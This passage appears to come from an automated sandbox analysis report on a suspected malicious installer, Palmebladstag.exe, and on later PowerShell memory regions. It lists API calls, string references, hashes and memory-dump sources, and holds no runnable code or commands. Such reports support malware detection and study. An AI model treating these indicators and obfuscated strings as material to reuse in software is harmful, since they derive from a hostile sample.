                                            • String ID: "C:\Users\user\Desktop\Palmebladstag.exe"$1033$Brandbltets Setup: Completed
                                            • API String ID: 530164218-4016325412
                                            • Opcode ID: 0d5c7e20af687c949574db8c6015d5dce51d8233c287b89ad0b602e841939b2d
                                            • Instruction ID: 3eeb35b712935f7be9db67fea1ba5421606f6b55dcd8c4013f5d2095cba695b6
                                            • Opcode Fuzzy Hash: 0d5c7e20af687c949574db8c6015d5dce51d8233c287b89ad0b602e841939b2d
                                            • Instruction Fuzzy Hash: 121108B1B046009BC721AF19CC809333BADEBC6756318823FED01673A1D77D9D028B68
                                            APIs
                                            • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004030D9,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76233410,0040329C), ref: 0040562A
                                            • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004030D9,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76233410,0040329C), ref: 00405633
                                            • lstrcatA.KERNEL32(?,00409014), ref: 00405644
                                            Strings
                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405624
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2163518572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2163503878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163534513.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163978071.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Palmebladstag.jbxd
                                            Similarity
                                            • API ID: CharPrevlstrcatlstrlen
                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                            • API String ID: 2659869361-3936084776
                                            • Opcode ID: db489587f03a436ea3115729a1eb7cc5b4759721d3bad8b493c3f74dc48da956
                                            • Instruction ID: 00b6ae861ddc274f1a22631493032202eb54a79e67bc778d52c9d7871f0e19dd
                                            • Opcode Fuzzy Hash: db489587f03a436ea3115729a1eb7cc5b4759721d3bad8b493c3f74dc48da956
                                            • Instruction Fuzzy Hash: C8D0A962A099302ED20226158C05EDB3A98CF02315B040873F200B22E2C67C2D418BFE
                                            APIs
                                            • GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401EEB
                                            • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F09
                                            • GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F22
                                            • VerQueryValueA.VERSION(?,00409014,?,?,?,?,?,00000000), ref: 00401F3B
                                              • Part of subcall function 00405AD5: wsprintfA.USER32 ref: 00405AE2
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2163518572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2163503878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163534513.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163978071.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Palmebladstag.jbxd
                                            Similarity
                                            • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                            • String ID:
                                            • API String ID: 1404258612-0
                                            • Opcode ID: 8a065e25df513d2c70edfbb38d14aece4aa2bad1db351d2eec3c415220230595
                                            • Instruction ID: d9cf4706ccd720fe68a9057b37b388a6d3cc99dc36037c8cf20abe177969b22e
                                            • Opcode Fuzzy Hash: 8a065e25df513d2c70edfbb38d14aece4aa2bad1db351d2eec3c415220230595
                                            • Instruction Fuzzy Hash: 02117071900108BEDB01EFA5DD81DAEBBB9EF04344B20807AF505F61E2D7789E54DB28
                                            APIs
                                            • CharNextA.USER32(?,?,C:\,?,00405729,C:\,C:\,?,?,76233410,00405474,?,C:\Users\user\AppData\Local\Temp\,76233410,00000000), ref: 004056CB
                                            • CharNextA.USER32(00000000), ref: 004056D0
                                            • CharNextA.USER32(00000000), ref: 004056E4
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2163518572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2163503878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163534513.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163978071.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Palmebladstag.jbxd
                                            Similarity
                                            • API ID: CharNext
                                            • String ID: C:\
                                            • API String ID: 3213498283-3404278061
                                            • Opcode ID: 3f639457ae052313cff0aaedcd272a5626d50e6f9abcac8e261aee29ca5e702c
                                            • Instruction ID: d8a7812ab63b142c46357df6d68c050b156b7c96d32b59c6f1bc793f3f64125f
                                            • Opcode Fuzzy Hash: 3f639457ae052313cff0aaedcd272a5626d50e6f9abcac8e261aee29ca5e702c
                                            • Instruction Fuzzy Hash: 86F0C251905F91AAFB3252640C44B7B9BCCDB55315F041467E641672C1C2BD4C405F9A
                                            APIs
                                            • DestroyWindow.USER32(00000000,00000000,00402DAF,00000001), ref: 00402BE2
                                            • GetTickCount.KERNEL32 ref: 00402C00
                                            • CreateDialogParamA.USER32(0000006F,00000000,00402B4C,00000000), ref: 00402C1D
                                            • ShowWindow.USER32(00000000,00000005), ref: 00402C2B
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2163518572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2163503878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163534513.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163978071.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Palmebladstag.jbxd
                                            Similarity
                                            • API ID: Window$CountCreateDestroyDialogParamShowTick
                                            • String ID:
                                            • API String ID: 2102729457-0
                                            • Opcode ID: 7de69ba99e19708d0d579c18d4dfd725f7e56dba20af062519453b561e00e44c
                                            • Instruction ID: d1c4e1838bfb856cd6d3ea9dd85ee240d54de3540c59ddf7a57925f8cf4fbe18
                                            • Opcode Fuzzy Hash: 7de69ba99e19708d0d579c18d4dfd725f7e56dba20af062519453b561e00e44c
                                            • Instruction Fuzzy Hash: 52F0D030909620BFC6616F18BD4CE5F7BA4E745B117518467F204A11A5D27CA8838FAD
                                            APIs
                                            • IsWindowVisible.USER32(?), ref: 00404E27
                                            • CallWindowProcA.USER32(?,?,?,?), ref: 00404E78
                                              • Part of subcall function 00403ED3: SendMessageA.USER32(00010408,00000000,00000000,00000000), ref: 00403EE5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2163518572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2163503878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163534513.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163978071.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Palmebladstag.jbxd
                                            Similarity
                                            • API ID: Window$CallMessageProcSendVisible
                                            • String ID:
                                            • API String ID: 3748168415-3916222277
                                            • Opcode ID: 526848415f932e083bf7b3d36508f4b1bda904cbcea418d5975b356f5bc0ad6e
                                            • Instruction ID: 7d65f4a0b806027d78491f0c636345f1b5379c259f2f3d92d144b4497ee353ee
                                            • Opcode Fuzzy Hash: 526848415f932e083bf7b3d36508f4b1bda904cbcea418d5975b356f5bc0ad6e
                                            • Instruction Fuzzy Hash: 600184B1500208ABDF219F21ED80EAB3726F7C5755F204137FB04761D1C7799C5196AA
                                            APIs
                                            • lstrlenA.KERNEL32(00000000,00000011), ref: 004024ED
                                            • WriteFile.KERNEL32(00000000,?,Afvandrende146\Microsoft\Windows\treefish\Uninstall\kemiingenirerne,00000000,?,?,00000000,00000011), ref: 0040250C
                                            Strings
                                            • Afvandrende146\Microsoft\Windows\treefish\Uninstall\kemiingenirerne, xrefs: 004024DB, 00402500
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2163518572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2163503878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163534513.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163978071.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Palmebladstag.jbxd
                                            Similarity
                                            • API ID: FileWritelstrlen
                                            • String ID: Afvandrende146\Microsoft\Windows\treefish\Uninstall\kemiingenirerne
                                            • API String ID: 427699356-2056447063
                                            • Opcode ID: 3cef86854935b84e53e3c98180def8d65e76d4bad5a01be8601258fba1151975
                                            • Instruction ID: d4cad745c1bb7ae9502ce82199ca69f85842da8443a3b9b3f3b852b520f082a9
                                            • Opcode Fuzzy Hash: 3cef86854935b84e53e3c98180def8d65e76d4bad5a01be8601258fba1151975
                                            • Instruction Fuzzy Hash: 4CF0E272A44245BFDB00EBA08E4AAAB3668CB01308F10843FB101F50C2D5FC99419B2D
                                            APIs
                                            • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,76233410,00403565,004033A9,?), ref: 004035A7
                                            • GlobalFree.KERNEL32(00000000), ref: 004035AE
                                            Strings
                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 0040359F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2163518572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2163503878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163534513.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163978071.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Palmebladstag.jbxd
                                            Similarity
                                            • API ID: Free$GlobalLibrary
                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                            • API String ID: 1100898210-3936084776
                                            • Opcode ID: a867077822133ff692d23af0c54fa15bc8068d047174f32ce19527d60d8a5524
                                            • Instruction ID: 25ceb6f6e8048fd8c7c72bafa6746df7c9a9eea5615397dbd2628d9726c916a8
                                            • Opcode Fuzzy Hash: a867077822133ff692d23af0c54fa15bc8068d047174f32ce19527d60d8a5524
                                            • Instruction Fuzzy Hash: 6EE08C32805020ABC6215F14AD0471AB6686B89B22F01406BE9407B2A087B8AD428BD8
                                            APIs
                                            • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402C9F,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Palmebladstag.exe,C:\Users\user\Desktop\Palmebladstag.exe,80000000,00000003), ref: 00405671
                                            • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402C9F,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Palmebladstag.exe,C:\Users\user\Desktop\Palmebladstag.exe,80000000,00000003), ref: 0040567F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2163518572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2163503878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163534513.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163978071.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Palmebladstag.jbxd
                                            Similarity
                                            • API ID: CharPrevlstrlen
                                            • String ID: C:\Users\user\Desktop
                                            • API String ID: 2709904686-3125694417
                                            • Opcode ID: 34a4f8c708b27f6946e7134e7721e231f8b12887e9b4f023f0af0bef71a59494
                                            • Instruction ID: 066a61083934c2e15797617eaf2660ffc2c94803564b26df0c9315ada1aa8723
                                            • Opcode Fuzzy Hash: 34a4f8c708b27f6946e7134e7721e231f8b12887e9b4f023f0af0bef71a59494
                                            • Instruction Fuzzy Hash: 38D0A762409D702EF30352108C04BEF6A88CF12300F0904A2E440E21D0C2781C418BED
                                            APIs
                                            • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,0040599C,00000000,[Rename]), ref: 0040579A
                                            • lstrcmpiA.KERNEL32(?,?), ref: 004057B2
                                            • CharNextA.USER32(?,?,00000000,0040599C,00000000,[Rename]), ref: 004057C3
                                            • lstrlenA.KERNEL32(?,?,00000000,0040599C,00000000,[Rename]), ref: 004057CC
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2163518572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2163503878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163534513.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163978071.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Palmebladstag.jbxd
                                            Similarity
                                            • API ID: lstrlen$CharNextlstrcmpi
                                            • String ID:
                                            • API String ID: 190613189-0
                                            • Opcode ID: 4d6aa7fcecb591248e5394db533e431d238a5c46998e6b160d14a30e062bce79
                                            • Instruction ID: df48b93824ef6af08d299fa443af8079e3e9d2208639ace1cb57769ac35cd01d
                                            • Opcode Fuzzy Hash: 4d6aa7fcecb591248e5394db533e431d238a5c46998e6b160d14a30e062bce79
                                            • Instruction Fuzzy Hash: DBF0C235504518FFC7029BA5DC4099FBBB8EF45350F2540AAF800F7210D274EE01ABA9
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.3048887003.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_4320000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: \V#m
                                            • API String ID: 0-1157912448
                                            • Opcode ID: 9ef6bb2f536750d5574b2a4138bbe7de0cc10e0020a46556571393a44559d492
                                            • Instruction ID: 0453626d30348d35848ec5401318d6868b8011a8e74d6087d9013714715e01bd
                                            • Opcode Fuzzy Hash: 9ef6bb2f536750d5574b2a4138bbe7de0cc10e0020a46556571393a44559d492
                                            • Instruction Fuzzy Hash: 4BB17D70E00229CFDF14CFA9CA857AEBBF2BF88704F149129D815A7254EB74A845DF81
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.3048887003.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_4320000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 199a3e6db22545e233d6aeed447c6ba5daee1b6de5db18ebdfb078d113c52362
                                            • Instruction ID: b5c806c6057af56e1b503c8e1adbda0306548625ba177bbb942ffb5bb8e8e000
                                            • Opcode Fuzzy Hash: 199a3e6db22545e233d6aeed447c6ba5daee1b6de5db18ebdfb078d113c52362
                                            • Instruction Fuzzy Hash: A0B18F70E00229DFDB10CFA9CA917ADBBF2BF88714F149529E815E7254EB74A841DF81
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.3053662173.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7040000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (f{l$(f{l$4xl$4xl$x.lk$x.lk$-lk
                                            • API String ID: 0-2904862062
                                            • Opcode ID: e34e7063276a439997880b5dec9b50d949810281b7c4f20cc608a368b3892240
                                            • Instruction ID: 870be97d863bcb6d98a4db5e8cb3b0f5110d106d581ac59aba1c66f79ed2bba1
                                            • Opcode Fuzzy Hash: e34e7063276a439997880b5dec9b50d949810281b7c4f20cc608a368b3892240
                                            • Instruction Fuzzy Hash: 1C9280B0A01215DFEB54DB58C959BAABBB2EFC5304F1081A8D909AF351CB71ED81CF91
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.3053662173.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7040000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (f{l$(f{l$(f{l$(f{l$x.lk$-lk
                                            • API String ID: 0-1846792564
                                            • Opcode ID: 20280a8bf7b7d8724722ba7be2f928f7b046d83b9ff05e954a40399699329934
                                            • Instruction ID: 161c9064af683c2e1be6b4bf60f76b7938edd88510c3998dba56cb03e7b38062
                                            • Opcode Fuzzy Hash: 20280a8bf7b7d8724722ba7be2f928f7b046d83b9ff05e954a40399699329934
                                            • Instruction Fuzzy Hash: 6CE28CF0B00205DFDB54CFA8C554B6ABBB2AFC5304F2482A9E915AB752CB71ED41CB91
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.3048887003.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_4320000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 8N#m$h]#m$h]#m$h]#m$I#m
                                            • API String ID: 0-4204022351
                                            • Opcode ID: b3216bbe2367823fe965127342e439334560d0793129ae1ed9495f3cb6040bc6
                                            • Instruction ID: deb2d24bb534a9b2cf8c10a925ab7cda4f14f0363f8586c86577122f7d7f2364
                                            • Opcode Fuzzy Hash: b3216bbe2367823fe965127342e439334560d0793129ae1ed9495f3cb6040bc6
